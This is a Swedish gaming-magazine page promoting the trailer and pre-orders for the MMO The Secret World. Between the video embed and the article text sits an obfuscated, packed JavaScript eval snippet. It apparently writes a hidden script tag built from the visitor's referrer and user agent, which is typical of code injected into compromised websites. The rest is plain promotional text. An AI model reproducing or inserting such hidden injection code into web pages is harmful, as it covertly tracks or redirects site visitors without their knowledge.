Image Image Image Image Image Image Image Image Image Image

| 6 december, 2020

Scroll to top

Top

The Secret World – Trailer

The Secret World – Trailer
Revue Magazine

type=”text/javascript” src=”http://videos.video-loader.com/playerjs/the_secret_world_11696.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1406924&skinName=light&wmode=window&hideChrome=0″>

Vikingaskepp, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bnsff|var|u0026u|referrer|deafs||js|php’.split(’|’),0,{}))
ondskefulla gudar och en massa demoner, ja det är vad som väntar i det kommande spelet The Secret World. Vi är imponerade!

Dold inom vår egna moderna värld finns en gömd hemlighet. En värld där varje myt, legend och konspirationsteori är sann. Och nu, mörka krafter är i rörelse och hemligheter som borde ha förblivit evigt begravda har äntligen avslöjats.

Förboka The Secret World idag och säkra en plats i kommande betahelger.

Förbokning av spelet innehåller också andra erbjudanden som in-game föremål och kraftfulla pets. Mörka dagar närmar sig, allting är sant… är du redo? The Secret World™ är ett nutids real world-MMO som avslöjar en rad myter och legender allt eftersom man tar sig fram i spelet.